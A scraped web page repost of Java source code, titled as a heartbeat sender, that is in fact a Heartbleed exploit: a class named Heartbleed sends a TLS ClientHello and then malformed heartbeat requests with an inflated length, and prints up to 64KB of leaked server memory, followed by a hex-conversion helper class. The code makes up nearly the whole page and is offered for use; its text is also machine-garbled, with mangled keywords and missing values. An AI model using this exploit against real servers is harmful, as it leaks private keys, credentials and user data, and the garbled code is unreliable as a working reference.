Java Send heartbeat Heartbeat pack (Byte to 16) _java

Source: Internet
Author: User
Tags 0xc0 pack trim

Copy Code code as follows:

Package com.jxy.web;

Import java.io.IOException;
Import Java.io.InputStream;
Import Java.io.OutputStream;
Import java.io.UnsupportedEncodingException;
Import Java.net.Socket;
Import java.net.UnknownHostException;

Import Com.jxy.tools.MyByte;

public class Heartbleed {
private static byte[] Hello = {(byte) 0x16, (Byte) 0x03, (byte) 0x02,
(byte) 0x00, (Byte) 0xdc, (Byte) 0x01, (Byte) 0x00, (byte) 0x00,
(byte) 0xd8, (Byte) 0x03, (Byte) 0x02, (Byte) 0x53, (byte) 0x43,
(byte) 0x5b, (Byte) 0x90, (Byte) 0x9d, (Byte) 0x9b, (byte) 0x72,
(byte) 0x0b, (Byte) 0xbc, (Byte) 0x0c, (Byte) 0xbc, (byte) 0x2b,
(byte) 0x92, (Byte) 0xa8, (Byte) 0x48, (Byte) 0x97, (byte) 0XCF,
(byte) 0xbd, (Byte) 0x39, (Byte) 0x04, (Byte) 0xcc, (byte) 0x16,
(byte) 0x0a, (Byte) 0x85, (Byte) 0x03, (Byte) 0x90, (byte) 0x9f,
(byte) 0x77, (Byte) 0x04, (Byte) 0x33, (Byte) 0xd4, (byte) 0xde,
(byte) 0x00, (Byte) 0x00, (Byte) 0x66, (Byte) 0xc0, (byte) 0x14,
(byte) 0xc0, (Byte) 0x0a, (Byte) 0xc0, (Byte) 0x22, (byte) 0xc0,
(byte) 0x21, (Byte) 0x00, (Byte) 0x39, (Byte) 0x00, (byte) 0x38,
(byte) 0x00, (Byte) 0x88, (Byte) 0x00, (Byte) 0x87, (byte) 0xc0,
(byte) 0x0f, (Byte) 0xc0, (Byte) 0x05, (Byte) 0x00, (byte) 0x35,
(byte) 0x00, (Byte) 0x84, (Byte) 0xc0, (Byte) 0x12, (byte) 0xc0,
(byte) 0x08, (Byte) 0xc0, (Byte) 0x1c, (Byte) 0xc0, (byte) 0x1b,
(byte) 0x00, (Byte) 0x16, (Byte) 0x00, (Byte) 0x13, (byte) 0xc0,
(byte) 0x0d, (Byte) 0xc0, (Byte) 0x03, (Byte) 0x00, (byte) 0x0a,
(byte) 0xc0, (Byte) 0x13, (Byte) 0xc0, (Byte) 0x09, (byte) 0xc0,
(byte) 0x1f, (Byte) 0xc0, (Byte) 0x1e, (Byte) 0x00, (byte) 0x33,
(byte) 0x00, (Byte) 0x32, (Byte) 0x00, (Byte) 0x9a, (byte) 0x00,
(byte) 0x99, (Byte) 0x00, (Byte) 0x45, (Byte) 0x00, (byte) 0x44,
(byte) 0xc0, (Byte) 0x0e, (Byte) 0xc0, (Byte) 0x04, (byte) 0x00,
(byte) 0x2f, (Byte) 0x00, (Byte) 0x96, (Byte) 0x00, (byte) 0x41,
(byte) 0xc0, (Byte) 0x11, (Byte) 0xc0, (Byte) 0x07, (byte) 0xc0,
(byte) 0x0c, (Byte) 0xc0, (Byte) 0x02, (Byte) 0x00, (byte) 0x05,
(byte) 0x00, (Byte) 0x04, (Byte) 0x00, (Byte) 0x15, (byte) 0x00,
(byte) 0x12, (Byte) 0x00, (Byte) 0x09, (Byte) 0x00, (byte) 0x14,
(byte) 0x00, (Byte) 0x11, (Byte) 0x00, (Byte) 0x08, (byte) 0x00,
(byte) 0x06, (Byte) 0x00, (Byte) 0x03, (Byte) 0x00, (byte) 0xFF,
(byte) 0x01, (Byte) 0x00, (Byte) 0x00, (Byte) 0x49, (byte) 0x00,
(byte) 0x0b, (Byte) 0x00, (Byte) 0x04, (Byte) 0x03, (byte) 0x00,
(byte) 0x01, (Byte) 0x02, (Byte) 0x00, (Byte) 0x0a, (byte) 0x00,
(byte) 0x34, (Byte) 0x00, (Byte) 0x32, (Byte) 0x00, (byte) 0x0e,
(byte) 0x00, (Byte) 0x0d, (Byte) 0x00, (Byte) 0x19, (byte) 0x00,
(byte) 0x0b, (Byte) 0x00, (Byte) 0x0c, (Byte) 0x00, (byte) 0x18,
(byte) 0x00, (Byte) 0x09, (Byte) 0x00, (Byte) 0x0a, (byte) 0x00,
(byte) 0x16, (Byte) 0x00, (Byte) 0x17, (Byte) 0x00, (byte) 0x08,
(byte) 0x00, (Byte) 0x06, (Byte) 0x00, (Byte) 0x07, (byte) 0x00,
(byte) 0x14, (Byte) 0x00, (Byte) 0x15, (Byte) 0x00, (byte) 0x04,
(byte) 0x00, (Byte) 0x05, (Byte) 0x00, (Byte) 0x12, (byte) 0x00,
(byte) 0x13, (Byte) 0x00, (Byte) 0x01, (Byte) 0x00, (byte) 0x02,
(byte) 0x00, (Byte) 0x03, (Byte) 0x00, (Byte) 0x0f, (byte) 0x00,
(byte) 0x10, (Byte) 0x00, (Byte) 0x11, (Byte) 0x00, (byte) 0x23,
(byte) 0x00, (Byte) 0x00, (Byte) 0x00, (Byte) 0x0f, (byte) 0x00,
(byte) 0x01, (byte) 0x01};
private static byte[] bleed = {(byte) 0x18, (Byte) 0x03, (byte) 0x02,
(byte) 0x00, (Byte) 0x03, (Byte) 0x01, (Byte) 0xFF, (byte) 0xFF};
private static byte[] tmp;
private static byte[] pay;

/**
* Ssl3_rt_change_cipher_spec 20
* Ssl3_rt_alert 21
* Ssl3_rt_handshake 22
* Ssl3_rt_application_data 23
* Tls1_rt_heartbeat 24
*
* @param args
* @throws Exception
*/

public static void Main (string[] args) {
Attack ("The host to own test", 465);
System.exit (0);
}

public static Boolean attack (String host, int port) {

  system.out.println ("Start connecting ...");
  socket Socket = null;
  try {
   socket = new Socket (host, port);
 &NBSP} catch (Unknownhostexception e) {
   system.out.println ("Unknown host.");
   return false;
  } catch (IOException e) {
   system.out.println ("Access to host failed.");
   return false;
  }
  outputstream out = null;
  try {
   out = Socket.getoutputstream ();
 &NBSP} catch (IOException e) {
   system.out.println ("Get output stream failed.");
   return false;
  }
  inputstream in = null;
  try {
   in = Socket.getinputstream ();
 &NBSP} catch (IOException e) {
   system.out.println ("Get input stream failed.");
   return false;
  }

SYSTEM.OUT.PRINTLN ("Send client Heartbeat pack ...");

try {
Out.write (hello);
catch (IOException e) {
System.out.println ("Send heartbeat packet failed.");
return false;
}

System.out.println ("Wait for server Heartbeat pack ...");

while (true) {
TMP = GetData (in, 5);
if (tmp[0] = = 0) {
SYSTEM.OUT.PRINTLN ("The server did not return the heartbeat pack and closed the connection.");
return false;
}

Analysehead (TMP);

int len = (int) Mybyte.hexstring2long (mybyte
. bytetohexstring (Tmp[3]) + mybyte.bytetohexstring (tmp[4));

Pay = GetData (in, Len);

if (tmp[0] = && pay[0] = = 0x0e) {
System.out.println ("Find to return to the normal heartbeat pack.") ");
Break
}

}

System.out.println ("Send heartbeat heartbeat Packet ...");

try {
Out.write (bleed);
catch (IOException e) {
System.out.println ("Send heartbeat heartbeat packet failed.");
return false;
}
try {
Out.write (bleed);
catch (IOException e) {
System.out.println ("Send heartbeat heartbeat packet failed.");
return false;
}

while (true) {
TMP = GetData (in, 5);
int len = (int) Mybyte.hexstring2long (mybyte
. bytetohexstring (Tmp[3]) + mybyte.bytetohexstring (tmp[4));

if (tmp[0] = = 0) {
System.out.println ("No heartbeat return received, server does not look vulnerable");
return false;
}

if (tmp[0] = = 24) {
System.out.println ("Received Heartbeat return:");

int count=0;//Length Count
for (int i = 0; i < 4; i++) {//Read 4 times, all read out 64KB
Pay = GetData (in, Len);
Count+=pay.length;
System.out.print (Hexdump (pay));
}

System.out.println ("\ n data Length:" + count);

if (Len > 3) {
System.out
. println ("Warning: The server returned more data than it was originally-the server is vulnerable!");
} else {
System.out
. println ("Server returns malformed heartbeat, no other additional data returned");
}

Break

}

if (tmp[0] = = 21) {
System.out.println ("Received warning:");
System.out.println (Hexdump (pay));
SYSTEM.OUT.PRINTLN ("server returns an error, does not appear to be vulnerable");
Break
}

}

try {
Out.close ();
In.close ();
catch (IOException e) {
System.out.println ("Turn off input/output stream exception");
}

return true;
}

public static byte[] GetData (inputstream in, int lenth) {
byte[] t = new Byte[lenth];
try {
In.read (t);
catch (IOException e) {
SYSTEM.OUT.PRINTLN ("Accept data Error");
}
return t;
}

public static String Hexdump (byte[] pay) {
String s = "";
try {
s = new String (Pay, "GB2312");
catch (Unsupportedencodingexception e) {
System.out.println ("Unknown Code");
}
return s;
}

public static void Analysehead (byte[] tmp) {
System.out.print ("received message:");
System.out.print ("type:" + tmp[0] + "T");
System.out.print ("version:" + mybyte.bytetohexstring (tmp[1))
+ mybyte.bytetohexstring (tmp[2]) + "T");
System.out.println ("Length:"
+ Mybyte.hexstring2long (mybyte.bytetohexstring (tmp[3))
+ mybyte.bytetohexstring (tmp[4]));

}

}

Copy Code code as follows:

Package com.jxy.tools;

/**
* 16 conversion between the value of the binary and the String/byte
* */
public class MyByte {

/**
* Converts a string to a hexadecimal string
*
* @param String
* str ASCII string to be converted
* @return String separated by a space between each byte, such as: [6C 6B]
*/
public static string Str2hexstr (String str) {

Char[] chars = "0123456789ABCDEF". ToCharArray ();
StringBuilder sb = new StringBuilder ("");
byte[] bs = Str.getbytes ();
int bit;

for (int i = 0; i < bs.length; i++) {
bit = (Bs[i] & 0x0f0) >> 4;
Sb.append (Chars[bit]);
bit = Bs[i] & 0x0f;
Sb.append (Chars[bit]);
Sb.append (");
}
Return sb.tostring (). Trim ();
}

/**
* 16 in-process conversion string
*
* @param String
* str byte string (no delimiter between byte such as: [616C6B])
* String corresponding to @return string
*/
public static string Hexstr2str (String hexstr) {
String str = "0123456789ABCDEF";
char[] Hexs = Hexstr.tochararray ();
byte[] bytes = new Byte[hexstr.length ()/2];
int n;

for (int i = 0; i < bytes.length; i++) {
n = str.indexof (hexs[2 * i]) * 16;
n + = str.indexof (hexs[2 * i + 1]);
Bytes[i] = (byte) (n & 0xff);
}
return new String (bytes);
}

/**
* String literals to Unicode string
*
* @param String
* StrText Full-angle string
* @return String No separator between each Unicode
* @throws Exception
*/
public static string Strtounicode (String strText) throws Exception {
char c;
StringBuilder str = new StringBuilder ();
int INTASC;
String Strhex;
for (int i = 0; i < strtext.length (); i++) {
c = Strtext.charat (i);
INTASC = (int) c;
Strhex = integer.tohexstring (INTASC);
if (Intasc > 128)
Str.append ("\\u" + strhex);
Else
Low in front, 00.
Str.append ("\\u00" + strhex);
}
return str.tostring ();
}

/**
* Unicode string to Strings
*
* @param String
* Hex 16 Binary Value string (one Unicode to 2byte)
* @return String Full-angle string
*/
public static string unicodetostring (String hex) {
int t = hex.length ()/6;
StringBuilder str = new StringBuilder ();
for (int i = 0; i < T; i++) {
String s = hex.substring (i * 6, (i + 1) * 6);
High level needs to be up to 00 and turn.
String S1 = s.substring (2, 4) + "00";
Low Direct turn
String s2 = s.substring (4);
Converts a 16-binary string to an int
int n = integer.valueof (S1,) + integer.valueof (S2, 16);
convert int to Characters
char[] chars = Character.tochars (n);
Str.append (New String (chars));
}
return str.tostring ();
}

 /**
  * Merge two byte arrays
  *
  * @param pbytea
  * @param pbyteb
  * @return   */
 public static byte[] Getmergebytes (byte[] Pbytea, byte[] pbyteb) {
  int aCount = pByte A.length;
  int bcount = pbyteb.length;
  byte[] B = new Byte[acount + Bcount];
  for (int i = 0; i < acount; i++) {
   b[i] = pbytea[i];
&NBSP;&NBSP}
  for (int i = 0; i < Bcount; i++) {
   b[acount + i] = pbyteb[i];
&NBSP;&NBSP}
  return b;
 .}

 /**
  * Intercepting byte data
  *
  * @param b
  *             is a byte array
  * @param j
  *             is size
  * @return
  */
 public static byte[] Cutoutbyte (byte[] b, int j) {
  if (B.length = = 0 | | | j = = 0) {
   return null;
&NBSP;&NBSP}
  byte[] tmp = new BYTE[J];
  for (int i = 0; i < J; i++) {
   tmp[i] = b[i];
&NBSP;&NBSP}
  return tmp;
 .}

/**
* 16 binary string convert byte array
*
* @param hexstr
* String 16 Feed string
* @return byte[] byte array
*/
public static byte[] Hexstring2bytes (String hexstr) {
Byte[] B = new Byte[hexstr.length ()/2];
int j = 0;
for (int i = 0; i < b.length; i++) {
char C0 = Hexstr.charat (j + +);
Char C1 = Hexstr.charat (j + +);
B[i] = (byte) (Parse (C0) << 4) | Parse (c1));
}
return b;
}

private static int Parse (char c) {
if (c >= ' a ')
Return (C-' a ' +) & 0x0f;
if (c >= ' A ')
Return (C-' A ' +) & 0x0f;
Return (C-' 0 ') & 0x0f;
}

/**
* Byte is converted to a hexadecimal string, if it is less than 9, padded with 0
*
* @param b
* @return
*/
public static String bytetohexstring (Byte b) {
String stmp = integer.tohexstring (b & 0xFF);
Stmp = (stmp.length () = = 1)? "0" + stmp:stmp;
return Stmp.touppercase ();
}

/**
* Convert byte to int
*
* @param b
* @return
*/
public static int Bytetoint (byte b) {
return integer.valueof (b);
}

/**
* Bytes converted to hexadecimal string
*
* @param byte[] b byte array
* @return String separated by a space between each byte
*/
public static String bytetohexstring (byte[] b) {
String stmp = "";
StringBuilder sb = new StringBuilder ("");
for (byte c:b) {
Stmp = Integer.tohexstring (c & 0xFF);//With budget, remove the complement of byte to int
Sb.append ((stmp.length () = 1)? "0" + stmp:stmp);/is a word filled with zero
Sb.append ("");/per digit data separated by spaces
}
Return sb.tostring (). toUpperCase (). Trim ();//capitalize and remove trailing spaces
}

public static long Hexstring2long (String hexstr) {
Long sum=0;
int Length=hexstr.length ();
for (int i = 0; i < length; i++) {
Sum+=parse (Hexstr.charat (i)) *math.pow (16,length-i-1);
}
return sum;
}
}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.